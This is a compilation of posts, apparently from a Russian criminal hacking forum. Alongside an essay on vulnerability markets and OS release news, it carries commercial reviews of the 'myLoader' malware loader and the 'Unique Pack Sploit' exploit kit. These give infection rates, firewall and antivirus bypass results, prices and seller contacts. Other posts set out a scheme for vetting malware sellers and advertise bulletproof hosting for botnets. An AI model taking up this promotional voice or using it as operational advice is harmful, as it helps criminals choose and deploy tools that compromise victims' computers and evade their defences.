Райнер Бёме (Rainer Bцhme) рассматривает несколько типов рынков уязвимостей. "Баг-челленджи" (bug challenges) и "баг-аукционы" (bug auctions) относятся к самым простым и известным видам. Например, Дональд Кнут обещает выплачивать за каждую найденную ошибку в издательской системе TeX некоторую сумму, увеличивающуюся со временем. Аналогично Mozilla Foundation платит исследователям за уязвимости, найденные в браузере Firefox. В зависимости от заявленной цены исследователь может предпочесть продать уязвимость вендорам, вместо того чтобы использовать ее для создания эксплойта. Для этого, однако, цена должна быть достаточно большой и увеличиваться с ростом количества установок и внедрений.

"Несмотря на возможность денежного выражения стоимости эксплойта, я бы не назвал этот подход прекрасным рынком уязвимостей, поскольку соответствующий рыночный механизм обладает множеством проблем, - пишет Бёме. - Цена на этом рынке определяется покупателем (то есть вендором ПО. - И.Щ.), а не является результатом договоренности". В результате она представляет собой только нижнюю оценку, и использовать ее затруднительно.

Еще один вариант: "брокеры уязвимостей" - здесь речь идет о компаниях, скупающих информацию о дырах в безопасности для ее перепродажи "хорошим людям" (вендорам ПО, корпоративным пользователям и т. д.). Такие компании существуют - например, iDefense, TippingPoint, Digital Armaments и др. С точки зрения общественной пользы, этот подход тоже далек от идеала - потому, в частности, что не сообщает никакой информации (о ценах уязвимостей и надежности продуктов) широкой публике. К тому же он вызывает соблазн у "плохих людей" (преступности) получить доступ к упомянутой информации.

Еще один вариант рынка - "exploit derivatives" (мне не удалось подобрать хорошего перевода этого термина). Суть его в том, что торговля на рынке происходит не самими эксплойтами и информацией об уязвимостях, а обязательствами выплатить определенную фиксированную сумму при наступлении того или иного события - например, обнаружения (или необнаружения) уязвимости какого-то конкретного продукта в конкретный момент времени. В этом случае стоимость подобных обязательств будет указывать на предполагаемую надежность продукта.

Так, производитель ПО, уверенный в своем продукте, может активно покупать контракты, по которым производятся выплаты, если уязвимость не будет обнаружена, - тем самым поднимая стоимость контракта практически до номинала. Аналогичным образом исследователь, обнаруживший уязвимость в продукте, считавшимся безопасным, может скупить контракты, выплаты по которым производятся в случае обнаружения уязвимости, а потом раскрыть свою информацию и продать контракты по более выгодной цене.

Наконец, Бёме рассматривает страхование - которое, обладая многими достоинствами, слабо распространено по разным техническим причинам.

Однако, несмотря на неплохую теоретическую проработку этого вопроса, легально продать найденный эксплойт сейчас непросто. Чарли Миллер пишет о своем опыте участия в легальном рынке уязвимостей и перечисляет связанные с ним проблемы: быстрое и неожиданное устаревание и обесценивание информации, отсутствие прозрачности в ценах, сложность поиска и проверки надежности покупателя, трудность доказательства обладания эксплойтом без раскрытия важной информации о нем.

Из двух попыток продажи уязвимостей Миллеру удалась лишь одна - да и та благодаря личным связям. Таким образом, можно заключить, что эффективного легального рынка в данный момент не существует.


Если ты такой распространенный, почему ты такой дырявый?

Кроме упомянутых в статье, есть и другие причины, вследствие которых производителю софта (и информационных систем вообще) невыгодно заниматься его безопасностью. Андерсон выделяет, например, стремление как можно быстрее захватить рынок и "замкнуть" на себе пользователей с помощью проприетарных технологий. Здесь работает так называемый закон Меткалфа (полезность продукта пропорциональна числу его пользователей), хорошо проявивший себя в ситуации с пакетом MS Office: даже сейчас, несмотря на усилия по распространению открытых стандартов для офиса, старые бинарные форматы файлов (doc, xls) остаются стандартом де-факто в документообороте и замыкают пользователей на продукты Microsoft. В этой ситуации разработчики платформы (например, Windows) должны на этапе захвата рынка как можно больше упростить жизнь разработчикам стороннего софта - а значит, не могут обременять их заботой о безопасности. "Мы доставим товар в этот вторник, но сделаем все как надо только к третьей версии - идеально рациональное поведение в условиях многих рынков", - пишет Андерсон - и именно это мы наблюдаем в попытках радикально улучшить безопасность Windows Vista.


Заключение

Исследование вопросов информационной безопасности давно вышло за рамки интересов технических специалистов и довольно активно исследуется представителями гуманитарных дисциплин - в первую очередь экономистами. Возможно, ключ к нашей безопасности лежит именно в этих исследованиях, а не в еще более быстром обновлении антивирусных баз и даже не в хитрых технологиях, против которых обязательно найдутся соответствующие технологии у другой, враждебной стороны.




[mod][DiFor:] Сабж датируется 2007 годом, но как аналит материал почитать всё еще интересно[/mod]
 
OpenBSD 4.5 Official Release

Cегодня, как всегда, точно по графику, вышла новая версия замечательной операционной системы OpenBSD 4.5!

Самые любопытные, на мой взгляд, изменения:

* Xenocara (based on X.Org 7.4 + patches, freetype 2.3.7, fontconfig 2.4.2, Mesa 7.2, xterm 239 and more)
* Gcc 2.95.3 (+ patches) and 3.3.5 (+ patches)
* Perl 5.10.0 (+ patches)
* Our improved and secured version of Apache 1.3, with SSL/TLS and DSO support
* OpenSSL 0.9.8j (+ patches)
* Groff 1.15
* Sendmail 8.14.3, with libmilter
* Bind 9.4.2-P2 (+ patches)
* Lynx 2.8.5rel.4 with HTTPS and IPv6 support (+ patches)
* Sudo 1.7
* Ncurses 5.2
* Latest KAME IPv6
* Heimdal 0.7.2 (+ patches)
* Arla 0.35.7
* Binutils 2.15 (+ patches)
* Gdb 6.3 (+ patches)
[New$paN]
Изменения в синтаксисе pf scrub в пользу match не включены в этот релиз, не смотря на то, что уже сравнительно давно висят в -current. Будет в 4.6. Также есть шансы, что в 4.6 попадет OpenSMTPd, ведется активная работа над поддержкой MPLS. Тео де Раадт в своем письме в misc@ также предупредил пользователей, заинтересованных в тестировании новой версии, что качать образы стоит только с официальных ftp зеркал, перечисленных на http://openbsd.org/ftp.html, так как в сети присутствуют фейки, в частности, на ftp://ftp.kd85.com/.


Подробно
 
logoars.jpg


Всем приятного!
И снова я на связи. Сегодня на нашем "рабочем столе" обзор нашумевшего лоадера.
Приступим.

Описание от автора:
"myLoader":

• Пробив на сплойтах при проверке показывал от 85 до 90%
• Oбxoд фaepвoллoв
f-secure internet security 2009
kis internet security 2009*
outpost internet security*
zonealarm последний
sunbelt internet security
Сomodo 3.0*
* Вылетает алерт,но лоадер всеравно корректно отрабатывает и полностью пробивает фаерволл даже в случае намеренной блокировки юзером.
• Oбxoд прoaктивныx зaщит
• Нeвидимocть в Систeмe
• Каждому клиенту выдается исключительно чистая от Антивирусов версия по мере спаливания производим чистки
• Peзидeнт
• Встроенный билдер с возможностью создавать билды,для aдвертов (загрузчиков)
• Статистика по каждому билду,удобно использовать,для контроля траффа от каждого адверта
• Возможность разделять трафик
• Возможность добавлять резервные урлы,прямо из админки
• Поддержка самообновлений
• Функция полного самоудаления
• Работа со странами
• Возможность прогрузки неограниченного количества файлов, любого размера.
• Работа даже под Гостём
• Персональный саппорт

Разовый myLoader - 450$
Резидентный myLoader - 700$
Чистки - 30$
Смена урла - 90$

* Бесплатно поможем поставить и настроить. Проконсультируем по всем вашим вопросам.

ICQ: 1213146
Jabber: my-loader@thesecure.at


http://forum.web-hack.ru/index.php?showtopic=85142
https://xss.pro/index.php?act=ST&f=104&t=17349&st=0
http://xakepy.ru/showthread.php?t=48893
http://forum.zloy.org/showthread.php?t=77486

На дамаге появился пост о продаже нового лоадера. Меня это заинтересовало и я связался с автором.
После некоторого обсуждения мне был выдан необходимый пакет файлов.

Установка:
хочу сказать, что ничего сложного не оказалось. Обычная закачка файлов по ftp + заливка базы через mysql. (Забегая наперед, хочу сказать, что к сегодняшнему дню в поставке админки myLoader уже есть файл инсталляции.)
Видим админку. (!!! Рис админки). Она сделана в светлых тонах, что не может не радовать глаза, давно уставшие от мрачных тонов.

Тесты:
Прежде всего хочется сказать автору огромное спасибо, за активную помощь. Начнем с того, что мне был выдан проплаченный аккаунт на av-check.com. И первым делом я проверил лоадер там. ав-чек. Рис. 1
Всего мной было проведено 3 теста по загрузке этого лоадера.
1. Первый тест я проводил проверочный. Со своего лоадера elite loader v2 я прогрузил 216 раз. Рис. 2 В админку отстучалось 170 ботов рис. 3. Что составляет 170*100/216=78,7%
2. После результатов первого теста, автор лоадера сказал, что для его продукта это слишком малый процент отстука. Мне были выданы обновления на админку и сделан новый билд лоадера. По утверждению автора - в него были внесены некоторые изменения по улучшению "живучести" и произведена чистка. Второй тест я проводил более серьезно. С лоадера /2к8/ было прогружено 2К. Рис. 4 в админку отстучалось 1330 ботов Рис. 5. Что составляет 1330*100/2000=66,5%. По этому тесту я хочу дать некоторые пояснения. Такой низкий отстук мог быть по моей вине. Дело в том, что я грузил файл с обычного 3-х баксового хостинга. А количество ботов онлайн было очень большим. Таким образом есть подозрение, что это просто не справился с пиковой нагрузкой мой хост. Хотя с другой стороны лоадер /2к8/ отрапортавал об успешной загрузке, что ставит меня просто в тупик. Есть еще мысль, что эти два лоадера просто не уживаются на одной машине. Маловероятно, но вполне возможно. Вообщем оставляю вам поле для размышлений, т.к. вразумительного объяснения я так и не нашел.
3. Третий тест был проведен на связке. Через связку Торнадо было прогружено 1К Рис. 6. В админку отстучалось 752 бота. Рис. 7. Что составило 752*100/1000=75,2%.

Фаерволл:
Тест на обход фаерволов я проводил у себя на виртуальной машине. Параметры были следующие: установлена чистая винда WinXP SP3 на VMware-workstation-6.5.0, настроена сеть (bridge). Образ был скопирован в резервную папку. Далее на чистый образ устанавливался фаерволл (все по дэфолту, никаких особых политик/настроек/нюансов), проверялась возможность доступа в локальную сеть и тестовый заход браузером на сайт. При этом фаерволы на автомате создавали правила для приложений. т.е. все как у обычного ламероватого пользователя, который не заморачивается нюансами.
Итак:
Kaspersky Internet Security 2009 - пробил, но был помещен в группу "слабые ограничения"
Online Armor Personal Firewall v3.5 - не пробил
Free Internet Security 2009 - пробил
Comodo Firewall + AntiVirus for Windows - не пробил
Zone Alarm Security Suite - пробил


Comodo | KIS | Online Armor
Тест считался успешно пройденным, если лоадер срабатывал незаметно для пользователя и я находил свой IP в админке лоадера. Если же пользователю было высвечено любое сообщение - тест считался проваленным, независимо от того, отстучался после этого лоадер в админку или нет.

Тест "В работе":
Хм. Долго думал как подойти к написанию этого раздела. Дело в том, что использование этого лоадера "в работе" вызывало у меня массу вопросов.
Начнем с того, что у меня (по словам автора, единственного) в админке постоянно возникали траблы. Не работали некоторые функции (стата по ip), отваливался флэш график (как выяснилось позже, вина моего хостинга), непонятные для меня варианты статы, вернее ее значений.
Поясню для читателей, автор сего лоадера и его компаньон не имели доступа в тестируемую админку до конца всех тестов. И обо всех возникающих затруднениях могли узнать только с моих слов (не всегда понятных, к сожалению). Но, в качестве защиты, хочется сказать, что все возникающие вопросы решались в самые короткие сроки. Либо мне говорили что и где я сделал неправильно, вернее не по шаблону, или же мне выдавались необходимые корректировки/патчи. Тут еще следует пояснить, что моя админка была в своем роде уникальна, т.к. клиенту выдается "полный пакет" у меня же был отключен билдер и внесены некоторые корректировки, касаемые невозможности использования бота в корыстных целях после окончания теста. Таким образом я не попадал в категорию клиентов и соответственно не получал обновления в полном объеме. Специально для меня каждое обновление корректировалось с учетом специфики моей админки.
Итак поехали:
В качестве загружаемого софта мной был выбран elite loader V3. Одинокий Волк выдал мне новую версию и я решил на ней и поэкспериментировать. Для этого я обратился за помощью к своему старому знакомому (известному вам по моим предыдущим обзорам icq: 685820 Ник r00f), который сделал мне крипт.
До начала теста я провел разведку на тему работоспособности моего экзешника. Он успешно отстучался в админку 47раз из 50. (!!! рис статистики до обзора).
Затем этот экзешник был помещен на VPS и был запущен прогруз. И тут меня ждал сюрприз!!! Ботам была выдана команда на прогруз 100 раз. Затем все остановилось и перешло в состояние stopped. И никакие манипуляции не помогали продолжить загружаться. Тут пришлось связаться с автором. Выяснилось, что в конфиге админки у меня стояли дэфолтные значения. А у них есть своеобразная "защита" от загрузки плохих файлов. т.е. после 100 прогрузов админка останавливала задание и ждала моего вмешательства. После этого я поправил сие значение в 100000 (для уверенности) и продолжил грузиться.
Кстати, в этой админке я нашел то, чего мне так не хватало в админке от Волка. Рис. 8 Это простая галочка "Удалить бота после исполнения задания". Это просто необходимо в случае "чистого" биза загрузок. В случае необходимости можно отгружать "в одни руки" не боясь повторного использования ботов.
А теперь подкину ложку дегтя. Значения, которые я видел в админке меня просто ставили в тупик. Есть два параметра get/loaded Рис. 9. Get - количество ботов, которые получили задание. Loaded - количество ботов успешно выполнивших его. Так вот, значения которые я там видел были самых невообразимых вариаций. Конкретно по этому тесту 2056/1017 49,4%. По другим тестам - get/loaded показал 9/10 Рис. 10 (я так и не понял, как количество ботов получивших задание могло быть МЕНЬШЕ количества ботов выполнивших его), 357/300 при лимите 300 Рис. 11. Для разъяснений я обращался к автору.
Мне было отвечено следующее:

Вообщем чтоб было понятно расскажу, как у нас работает система работы подсчета лимитов.
На самом деле у нас довольно грамотна реализована система подтверждения файлов и лимитирование именно по успешному запуску. А не по взятому заданию (как в большинстве лоадеров)

Работает она так:
Сначала бот получает задание (в этом моменте в админке появляется +1 Get) далее лоадер проверяет запускался ли этот файл на запускаемой тачке ранее. Если нет запускает его и ждет,когда он успешно выполнится. В случае успешного выполнения лоадер идет в админку и отчитывается. Вот тут-то и появляется +1 в loaded
именно по этому параметру считаются лимиты!
НО
Теоретический возможна ситуация,когда при очень быстром потоке трафика последний бот\ы возьмет\ут задание ещё до того, как пришёл последний не хватающий отчет.
В этом случае задание в любом случае стопнется, но новые (запаздывающие) боты пришлют отчеты. И получится,что в отчетах будет не много больше ботов,чем указывалось в лимите. Но ботов ведь никак нельзя отрегулировать по времени т. к получается,что фактор скорости отстука заранее не известен. Можно отрегулировать отчетность,чтоб после 100% больше она не считала,но это же получится вранье и пользователь просто не сможет узнать точную цифру на скольких тачках был запущен прогружаемый файл. Однако даже такая погрешность не может быть существенной. Я полагаю,что в прошлый раз myLoader выдал тому клиенту просто старую админку (где как раз лимит считался только по Get ) а новый лоадер давал отчеты именно по loaded. Вот и получалась сильная погрешность.
Кстати точно такая же система отчетности работает во всех спам-ботах,т. к она считается наиболее точной. Ну и в лоадере я считаю важна точность и реальные показатели. А не примерные статы (как в большинства лоадеров)
Кстати только такая система сделает почти не возможным расхождение по статам,если через лоадер грузить что-то другое

С написаным полностью согласен. Притом такую ситуацию я специально провоцировал на этой админке. Рис. 12
А вот с остальными тестами я ничего не понял. Мы долго общались в жабе и меня убеждали в том, что закриптованный elite loader v3 не срабатывает на части машин и поэтому такой плохой результат успешного отгруза. Я ставил его грузиться несколько раз и результат почему-то везде был "плачевным". Рис. 13.
Для чистоты эксперимента DeusTirael предложил провести небольшой тест. Специально для меня была написана маленькая прожка на асме. (я ее нежно назвал СТУКАЧ!). Суть проста до безобразия. Это обычная нерезидентная стучалка в стату без всевозможных обходов фаерволов и т.д. Притом она палится тремя антивирусами. При успешном "стуке" в txt файл добавляется ip компа. И все. Затем стукач умирает. Исходники стукача.
Я проводил два теста. В первом мы прогрузили стукача через ту же связку. Результат был ошеломительный. Прогружено 500 отстучалось 418, что составляет 418*100/500=83,6%.
Затем этого стукача я прогрузил через myLoader. Рис. 14. Зачем? Для чистоты эксперимента. Если криптованный лоадер от Волка возможно "не срабатывает", то я подумал о стукаче. Итак, результат оказался хорошим. 300 отгружено, 272 отстучалось. 272*100/300=90,6% Что для обычной тупой стучалки является просто сногсшибательным результатом.

Реверс:
Уважаемый всеми el- обещал сделать реверс последней версии этого лоадера, но был очень занят реалкой. Как только у меня появятся данные по реверсу я обязательно добавлю их в этот обзор.

Итог:
Как результат - я увидел лоадер. Хороший/плохой - решайте сами. Моя задача - описать продукт. В плюсы могу сказать, что суппорт на высоте. Любые вопросы решались очень быстро. В онлайне практически всегда. В качестве минуса - на борту лоадера dll и криптовать его "на стороне" становится несколько сложнее. Кроме того, при анализе работы самого лоадера я насчитал 12 создаваемых в системе файлов. Что на мой взгляд, довольно много.
Всем заинтересовавшимся могу предложить следующую схему работы. Перед покупкой просите автора тестовую админку и смотрите ее вдоль и поперек. Если какие-то особенности - автор быстро все сделает "под вас". Тут я не сомневаюсь. Плюс просите в онлайне 100-200 ботов (в этом вопросе не экономьте, договоритесь с автором и заплатите за небольшой прогруз) и пробуйте с ботами РАБОТАТЬ. Притом, работать так, как ВЫ это видите. И в этом случае не будут больше возникать непонятки, блэки и прочий трэш. Вообщем, при таком варианте событий и вам, и автору, и нам (модерам/админам) будет значительно легче.

Спасибо el-, r00f (icq 685820), myLoader, Posoh, DeusTirael и всем тем, кто за меня "болел".
Засим разрешите откланяться.

p.s. Все вышенаписанное - это всего лишь плод моей бурной фантазии. Никакого лоадера нет, тестов нет, и меня тоже нет ;) Я вам тоже примерещился...

Записки на полях, специально для xss.pro/

Полная галерея скриншотов, частично использованных в обзоре. Бонусом разместил скриншоты админки, статы и т.д.
Галерея скриншотов по тестам на фаерволы. Тест делали на WBX.
 
Slackware. Теперь 64 бита

Slackware_ddj.png

Патрик Фолькердинг и SlackTeam объявили об официальном выходе Slackware для 64-битных систем. DVD будут доступны после релиза 13 версии Slackware.

"Отдельное спасибо я хочу сказать Эрику Хамелирсу (Eric Hameleers), который проделал действительно огромную работу по сборке, тестированию и вливанию этой версии в current-ветку" - говорит бессменный лидер проекта Патрик Фолькердинг

Slackware64-current
 
хостинг-провайдер 3FN closed

Крупный хостинг-провайдер 3FN , зарекомендовавший себя хорошим качеством услуг и неплохо пропиаренный на форумах за последнее время, со вчерашнего вечера недоступен.Учитывая количество людей, которые перенесли на него свои основные проекты и сайты, драма в течение ночи достигла своего эпогея и высшего накала страстей. Иск против 3fn на русском.

FTC приостановил деятельность известного Хостинг провайдера - 3FN. Компании предъявлены иски за содержание Botnets, Фишинг сайтов, Детской порнографии, и Другом Незаконном Веб-содержимом.

Интернет провайдер, который принимал на обслуживание сайты, и активно участвует в распространении спама, детской порнографии, и другого незаконного электронного содержания, был закрыт судьей окружного суда по требованию Федеральной торговой комиссии.
[New$paN]
Согласно FTC, ответчик, Pricewert LLC, который занимается коммерцией под множеством названий включая 3FN и Телекоммуникация APS, активно принимает на обслуживание и тайно сговаривается с преступниками, стремящимися распространить незаконное, злонамеренное, и вредное электронное содержание включая детскую порнографию, программы - шпионы, вирусы, троянских коней, phishing, botnet, и порнографическое насилие. FTC утверждает, что ответчик рекламировал свои услуги по размещению незаконного материала в самых популярных уголках Интернета.

Истец утверждает, что Pricewert активно защищал его преступную клиентуру или игнорировал запросы, а также уклонялся от несения ответственности.

FTC также утверждает, что ответчик участвовал в развертывании и использовании botnets. Botnets может использоваться для множества незаконных целей, включая рассылку спама и запуск сетевых атак. Согласно FTC, ответчик принял на обслуживание систему бота, которая подвергла опасности большое количество компьютеров в сети интернет.

Суд выпустил временный запретительный судебный приказ приостановить незаконную деятельность Pricewert’s и потребовать, чтобы интернет провайдеры прекратили оказывать услуги Pricewert. Указ также замораживает Все активы Pricewert’s. Суд будет исполнять принятое решение, а судебное разбирательство назначено на 15 июня 2009 года.

Преступление было раскрыто с помощью Office НАСА главного инспектора, Подразделения Компьютерного преступления; Gary Warner, Директора Исследования в Компьютерах Forensics, университет Алабамы в Бирмингеме; Национальный Центр и Эксплуатации; Фонд Shadowserver; Корпорация Symantec; и Проект Spamhaus.

Голосование Комиссии, чтобы утвердить судебное решение было 4-0. Жалоба была подана в американском Окружном суде для Северного Района Калифорнии, Подразделения Сан-Хосе.

Источник: Капча.Маньяки
 
Пожалуйста, обратите внимание, что пользователь заблокирован
1_25.gif


У нас небольшие изменения на портале. И в связи с этим акция под дивизом: "Не будь Оленем, пройди проверку!" :)

Создана группа проверяющих селлеров на форуме, позже у них будет специальная иконка группы.
Пока что вы можете посмотреть проверяющих на странице правил раздела форума Товары и Услуги

Проверяющие форума:
По темам скриптов / сплоитов любых веб-приложений проверяет: DeusTirael
По темам трафа / загрузок / софта не требующего реверсинга проверяет: Ar3s
По темам VX / RAT / троянов требующие реверсинг проверяет: el- или SilverT
По всем спорным вопросам проверок, решается только совместно с администрацией проекта.
В особых случаях по инициативе продавца проверяет: Одинокий Волк или Winux.
[New$paN]
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Продолжаем выделять проверяющих.
На этот раз были внесены следующие изменения/дополнения в их обязаности:
- Проверяющие имеют специальный статус DL Verifier Group, определить можно по иконке статуса: http://xss.pro/style_images/2/folder_team_icons/Verifier.gif
- Чуть позже доделаем, группы юзеров прошедших проверку будут иметь 2 статуса: "Продавец" и "Сервис" с ссылками на темы и результаты проверок.
- Результаты проверок с сегодняшнего дня будут писаться строго в виде анкеты.
Пример результата проверки от проверяющего:

- Соответствует ли описание товара всем пунктам?
Пример ответа1: да, соответствует полностью.
Пример ответа2: нет, соответствует не полность, было выявлено, что нет обходов проактивки КИС2009, так же софт спалил McAfee.
Пример ответ3: да, но было установлено что данный код частично взят с "БЛАБЛА"

- Какие тесты были проведены?
Пример ответа1: Софт проверяли на виртуалке: Linux Wolf 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:58:03 UTC 2009 x86_64 GNU/Linux (пример просто своей машины скопировал :))
Фаерволлы и АВ: Outpost, BitDefender, KIS2009, AWAST!, Avira
Проверка заключалась в проверки автозагрузке софта, в проверки отстука, проверки обходов фаерволлов и проактивок указанных в описание.
Проверялась работа каких-то функций и т.п. лучше подробно :)

Пример ответа2: Софт проверялся на сервере Linux Wolf 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:58:03 UTC 2009 x86_64 GNU/Linux apache2, mysql5, php5
Проводился полная проверка работы функций скриптов, проверялся исходный код на шеллы и другие возможные баги.

- Ваш отзыв о селлере.
Пример ответа1: Селлер адекватный, спокойно общался, всё объяснил и предоставил.
Пример ответа2: Селлер постоянно нервничал, подгонял с проверкой, отвечал на вопросы нервно.

- Оценки софта.
Систему оценок предлагаю построить следующим образом:
Оценка за общею проделанную работу: 1-5
Оценка за уникальность идеи: 1-5
Оценка за реализацию: 1-5
Общая оценка: сумма чисел оценок выше.

Так же хотелось напомнить вам, что у нас на форуме проводиться написание обзоров на ваш софт(хочу отметить что мы единственные кто этим занимается).
Условия написания простые:
- вы должны будете предоставить полностью софт и всё что вы даёте своему клиенту
- с вами будет работать 1 человек, который пишет обзор, ему могут помогать проверяющие/участники DL Team по мере необходимости проф.знаний в той или иной области.
- хочу отметить что ваш товар дальше нашего форума не уйдёт и мы сами не будем им пользоваться, у нас свои моральные принципы
- какую с этого выгоду мы тогда получим? всё очень просто, мы получаем уникальный контент, которого нет нигде в сети, а соответственно привлекаем новых пользователей.
- так же отмечу, что обзор является независимым его нельзя купить или попросить что-то писать, а что-то нет, перед публикацией идёт только согласование с селлером и предоставление текста обзора для исправления каких-то непонятных моментов, плюсы и минусы товара остаются неизменными и публикуются.

Всем спасибо за то что вы с нами ;)
[New$paN]
 
logovpv.jpg

-------------------------====<Вступление>====----------------------

И снова здравствуйте.
Жара, лето, лень... Работать абсолютно не хочется. Мозг регулярно расплывается от жары...

Но суть сегодняшнего обзора иная.
Ко мне в асю постучался человечек и сообщил, что он автор нашумевшей в свое время связки Unique Pack Sploit.
Сообщил, что в связи с тем, что решил вновь вернуться на "сцену", создал более новую версию своей связки и хочет чтобы я написал обзор этой связки. Сделал тест и опубликовал результаты. Меня обрадовало то, что люди сами стали стучаться ко мне и предлагать продукты для обзоров.
Итак:
Описание от автора:
https://xss.pro/index.php?topic=17750

Останавливаясь на главном, видим:
1. На борту:
[ + ] MDAC Modified - for IE 5, 6
[ + ] SNAPSHOT - for IE 7
[ + ] TELNET - for OPERA 9.0 - 9.25
[ + ] PDF collab.getIcon - for all
[ + ] PDF Util.Printf - for all
[ + ] PDF collab.collectEmailInfo - for all

2. Админ-панель выполнена в удобном для работы стиле, не "режет" глаза и имеет
все необходимые функции

3. Приблизительный ОБЩИЙ пробив сплойтов:
на RU трафе составляет: от 10% (адалт) до 30% (хороший траф)
на US трафе составляет: от 3%-5% (адалт) до 15-20%% (хороший траф)

-------------------------====<Установка>====----------------------

Что ж. Приступим.
Получаю от автора связку.
Размер связки в распакованном виде составляет 1,28 мб. (Рис.1)
Заливаем связку по ftp на сервак и согласно подробного Readme вносим данные в файл ./cfg/config.php (Рис.2)
(Синим отметил где я вносил изменения)

Открываем браузер и запускаем http://site.ru/unik/install.php
т.к. я все данные внес правильно, видим счастливую надпись "Installation finished Please delete install.php"
Все правильно.

Переходим на http://site.ru/unik/stats.php и видим админку. (Рис.3)
Ну что же. Автор не соврал. Админка действительно выполнена в приятных тонах и абсолютно не режет глаз. В ней можно смело провести не один час наблюдая за показателями и не устать.
При этом используется около 40Кб трафика. Хорошо.

Далее находим трафик и криптуем наш exe. Exe ложим в папочку со связкой под указанным нами в конфиге именем.
Траф льём на http://site.ru/unik/index.php

-------------------------====<Тесты>====----------------------

Первым тестом шел адалт.
Результаты таковы:
HITS - 3034, Loads - 272, Total - 8.97%
(для сравнения, на этом трафике торнадо дает пробив 8.37%)
Рис.4 | Рис.5 | рис.6

Вторым тестом шел iframe траф.
(честно говоря, с этим трафом у меня был напряг. Долго не мог найти. Вообщем спасибо добрым людям. Мне помог один знакомый ReeD icq 44444544. За что ему одельная благодарность!)
Результаты таковы:
HITS 1047 - , Loads - 123, Total - 11.75%
(По словам человека, предоставившего трафик, для этого трафика нормальным считается пробив 13-15%)
Рис.7 | Рис.8 | рис.9
Блииин. Писал обзор - нашел в связке еще одну функцию. Она каждый тип браузеров в статистике еще и на версии разлаживает.
А я сразу и не обнаружил... ЛОЛ.

В обоих случаях я грузил Elite loader V3 от Одинокого Волка.
Закриптованный уже известным вам, по прошлым моим обзорам человеком. (r00f icq 685820. ОЧЕНЬ СОВЕТУЮ! Отличный человек, хороший спец.)
В первом тесте отстук составил:
272 - отгружено
142 - отстучалось
142*100/272 = 52,2%

Во-втором тесте отстук составил:
123 - отгружено
80 - отстучалось
80*100/123 = 65%

Как видно на скринах связка абсолютно не пробивала на моем трафе FF. С этим вопросом я обращался к автору.
На что мне было отвечено, что на сегодняшний день идет странная тенденция. Траф FF то бьется, то нет. И это напрямую зависит от качества трафика.
В качестве подтверждения работоспособности связки, в плане FF, мне было предоставлено автором два скрина. На первом из них видно, что FF все-таки бьется этой связкой.
рис.10 | Рис.11

Несколько позже, пробуя различные виды трафа я сам убедился что FF пробивается, У меня очень вяло, но все-таки пробило. Рис.12
Как вы уже знаете, я не делаю сейчас в своих обзорах анализа качества работы. Эту часть я оставляю на совесть каждого читателя.
т.к. Для одного полученный результат - это хорошо, для второго - слишком мало и т.д. Вообщем, тем кто в теме и знает реальные получаемые результаты, все станет итак понятно.

-------------------------====<Анализ эксплоитов от DeusTirael>====----------------------

Любезности:
1. Хорошее шифрование выдачи связки. Если еще совсем слегка доработать и избавиться от некоторых сигнатур, то антивирусы обламаются навсегда.
2. Эксплойты работают тихо и быстро. Для сбережения траффика это очень хорошо.
3. База почти не напрягается, так что связка должна держать довольно хорошие объемы трафика.
4. Админка простая в установке и использовании. Достаточно информативная.


Гадости:
1. Не забывать обновлять GeoIP во 2-4 числах каждого месяца http://geolite.maxmind.com/download/geoip/...ry/GeoIP.dat.gz
2. Не совсем понятно для чего в файле getexe.php строка define('EXE', "$file");
3. Привязка реализована с ошибкой:
if(!eregi("domain.com", $_SERVER['HTTP_HOST'])) die('Not licence version the program!');
Cвязка будет считать себя лицензионной на доменах "1domain.com","lala-domain.com" ...
Вобщем при добавлении к началу лицензированого домена любой последовательности символов.
5. TELNET - for OPERA 9.0-9.25 на самом деле бьет 9.0-9.19 и 9.20 только первые бетки. Я съем свою шляпу если этот эксп сработает на 9.25 =\
При тестировании на 9.0 файл не запустился, но в админке загрузка была показана, Это, возможно, кривость уже моих рук.
6. Кстати снепшот тоже не сработал. Возможно офис у меня не той версии.

Вцелом впечатление хорошее.

p.s. by Ar3s - В данный момент автор связки обо всех найденных нюансах проинформирован и проводит исправления.

-------------------------====<Другое>====----------------------

Так же связку я проверил на паливность выдачи.
На 19.06.2009 анализ вадачи показал 0/24!
Скан выдачи FF | Скан выдачи Opera | Скан выдачи IE | Скан выдачи IE_Seven
В тест на АВ я отправлял каждую выдачу на проверку индивидуально (особенности связки).

Хочется так же добавить, что автор не соврал по-поводу "тихой" работы.
Во время тестирования я заходил на связку различными браузерами (FF 3.0.11, 3.0.6, Opera 9.64, 9.27, IE 8, 7, 6) и Использовались мной WinXP SP3 (с установленным пакетом PRE SP4), WinXP SP2, WinXP SP1. Во всех случаях не было замечено никаких зависаний браузера/системы.
А так же, во всех случаях при повторном заходе мне выдавало положенные 404.
Подтверждаю. Заявленные автором функции работают.

В качестве анализа адекватности автора, хочу написать следующее: В разговоре был учтив, никаких быдловыпадов, жаргонов и загонов не замечено.
Всегда активно помогал, всячески старался разъяснить те или иные моменты. Сложилось впечатление надежного человека.

Как модератор этого форума, напоминаю вам о возможности делать тесты перед покупкой. Автор человек понятливый. Я думаю вы без проблем сможете договориться на тест связки на вашем трафе. И сделаете выводы основываясь на конкретной цифре. Это для вашего (покупатели/продавцы) и нашего (админы/модеры) спокойствия. Попробовали товар => понравился=>купили. Не понравился => разбежались без блэков, срача и прочей лабуды.

-------------------------====<На правах рекламы>====----------------------
Для проведения этого теста я искал новую площадку.
На одном из форумов увидел рекламу абузного хостинга. Цены очень удивили.
Хостинг под ботнеты/связки/гейты/адалт от 40 до 65 у.е.
Серверы в нескольких странах, абузоустойчивые домены и т.д.
Вообщем встречайте:
bannerlcw.gif


За время всех моих тестов площадка не глюкала, все работало на уровне.
Суппорт всегда откликался и подсказывал, в период, когда я разбирался с панелью управления.

-------------------------====<Благодарности>====----------------------
DeusTirael (анализ связки/траф), ReeD (траф), SharedHost (за предоставленный хостинг).
Ну и конечно огромная благодарность всем нашим читателям. СПАСИБО что вы с нами!

Записки на полях, специально для xss.pro/

p.s. ссылка на галерею скриншотов использованных в обзоре.
 
Как вам всем известно - существует русский перевод классического FASM manual-а, выполненный Paranoik-ом. Но, по причине того, что сверстан этот перевод был в виде двух txt файлов - читать, а уж тем более печатать эти документы было адски сложно, а результат был абсолютно непрезентабельным.

Маясь от скуки во время жуткой жары, когда программировать организм отказывался и работали лишь простейшие двигательные рефлексы, я решил исправить ситуацию.

